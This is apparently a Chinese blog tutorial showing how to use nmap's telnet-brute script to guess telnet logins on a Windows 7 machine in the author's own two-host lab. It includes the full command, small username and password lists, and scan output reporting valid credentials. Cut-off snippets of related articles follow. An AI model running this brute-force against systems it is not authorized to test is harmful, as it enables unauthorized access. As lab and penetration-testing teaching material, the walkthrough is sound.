【20171115中】nmap 使用脚本爆破telnet密码

今天老黑走出了低谷,设置了惩罚机制后效率提升了很多,现在写一个使用nmap检测目标主机漏洞和利用漏洞的文章,话不多说,直接开始!

0x01:环境介绍

  主机A:系统 - kali2017,IP - 192.168.1.104

  主机B:系统 - win7x64,IP - 192.168.1.103

  使用主机A扫描并攻入主机B

0x02:确认主机B开启了telnet的23端口

  主机B没有开启,我自己开启一下。

  s1:控制面板 -> 程序 -> 打开或关闭windows程序 -> 选中下图选项框,点击确认后重启系统。

  s2:确认计算机telnet服务是否已经开启。打开计算机右击 -> 管理 -> 服务和应用程序 -> 服务 -> 找到Telnet服务,并将其开启服务和设置自动

0x03:在主机A扫描确认主机B是否开启了23端口

  

0x04:进行爆破

  s1:参考官网了解,爆破命令如下

nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>

  s2:制造自己的myusers.lst和mypwds.lst

    老黑将自己的账号AAAA放在myusers.lst中,如下:

    

AAAA
AA22
ASDFSA
SDSDD

    将自己的密码BBBB放在mypwds.lst中,如下:

BBBB
BB23
DFASDFA
SADFAA

    根据主机A的环境,调整命令,如下:

nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

  s3:执行命令,等待结果

[email protected]:~# nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-15 18:18 CST
Nmap scan report for promote.cache-dns.local (192.168.1.103)
Host is up (0.091s latency).

PORT   STATE SERVICE
23/tcp open  telnet
| telnet-brute:
|   Accounts:
|     AAAA:BBBB - Valid credentials
|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
MAC Address: XXXXXXXXXXXXX (xxxxxxxxxxxx.)

Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds

  

0x05:telnet登陆主机B,WELL DONE!

时间: 2024-10-11 04:54:34

【20171115中】nmap 使用脚本爆破telnet密码的相关文章

SecureCRT中使用VBs脚本自动telnet登陆

查看SecureCRT帮助文档: Help-> Help Topics->Scripting -> Script Objects Reference -> Session Object #$language = "VBScript" #$interface = "1.0" crt.Screen.Synchronous = True ' This automatically generated script may need to be ' e

shell脚本中实现自动判断用户有无密码

在最近完成老师布置的作业的时候遇到了如何让shell脚本中的命令自动判断一个用户是否已设置密码的问题,虽然看似不是很难的一个问题,但是在这一功能实现的过程中却包含了许多细小的而重要的知识.刚开始小编对此很是头疼,虽然我们查看一个用户是否有密码并不是很难,直接cat /etc/shadow这个文件看看密码位是否有加密的字符就行了,但是让命令自己去判断和匹配就不是很顺利了,小编上网查看后,并没有得到很好的答案,大多数都是人工查看的答案,并不适用于shell脚本中自动的判断,所以在认真对比/etc/p

一些Nmap NSE脚本推荐

前言 Nmap是一款强大的开源扫描工具.同时Nmap提供了强大的脚本引擎(Nmap Scripting Engine),支持通过Lua脚本语言来扩展Nmap的功能,在Nmap的发行版中已经包含了数百个扩展脚本,除了辅助完成Nmap的主机发现.端口扫描.服务侦测.操作系统侦测四个基本功能,还补充了其他扫描能力:如执行HTTP服务详细的探测.暴力破解简单密码.检查漏洞信息等等. 脚本分类及使用 分类 Nmap脚本主要分为以下几类,引用自:Nmap脚本使用总结: auth: 负责处理鉴权证书(绕开鉴权

.net(C#)在Access数据库中执行sql脚本

自己写的一个工具类,主要是业务场景的需要. 主要有两个功能: ①执行包含sql语句的字符串 ②执行包含sql语句的文件 调用方式 1 /// <summary> 2 /// 执行sql语句 3 /// </summary> 4 /// <param name="sql">需要执行的sql语句</param> 5 public bool ExecuteSql(string sql, ref string errorMsg) 6 { 7 Se

linux环境中执行Mysql脚本

1.首先进入shell~ 2.进入服务器后,输入mysql -h localhost -u root -p,进入MySql: 3.输入MySql密码: 4.将脚本复制到服务器,具体怎么做,可以用Xftp; 5.例如,我执行的test.sql,在/usr/local/test.sql目录下,在shell中输入source /usr/local/test.sql linux环境中执行Mysql脚本,布布扣,bubuko.com

Hadoop中的控制脚本

1.提出问题 在上篇博文中,提到了为什么要配置ssh免密码登录,说是Hadoop控制脚本依赖SSH来执行针对整个集群的操作,那么Hadoop中控制脚本都是什么东西呢?具体是如何通过SSH来针对整个集群的操作?网上完全分布模式下Hadoop的搭建很多,可是看完后,真的了解吗?为什么要配置Hadoop下conf目录下的masters文件和slaves文件,masters文件里面主要记录的是什么东西,slaves文件中又记录的是什么东西,masters文件和slaves文件都有什么作用?好,我看到过一

shell脚本-批量telnet

由于现网有时候要测试很多端口的连通性,所以就写了个小脚本,实现批量测试 将telnet成功的写入到telnet_alive.txt中,失败则写入telnet_die.txt中 #!/bin/bash#this script test UP to other host.#Iplist=/opt/script_test/iplist.dataPortnumber=7001for ip in $(cat iplist.data)do  (sleep 1;)|telnet  $ip $Portnumbe

今天中了一个脚本病毒。把我的所有 html 加了 vbs 脚本,WriteData 是什么鬼?

今天中了一个脚本病毒.把我的所有 html 加了 vbs 脚本: WriteData 是什么鬼? <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000

【JSP】JSP中的Java脚本

前言 现代Web开发中,在JSP中嵌入Java脚本不是推荐的做法,因为这样 不利于代码的维护.有很多好的,替代的方法避免在JSP中写Java脚本.本文仅做为JSP体系技术的一个了解. 类成员定义 1.将定义的代码放在<%! %>之间即可. 定义的成员将被转换为servlet类的成员. 2.可以定义任何成员方法和成员字段,static 成员 或者 实例成员都可以. 3.注意JSP/Servlet是工作在多线程环境下的,定义的成员变量要注意线程安全问题.一般建议使用_jspService方法中 的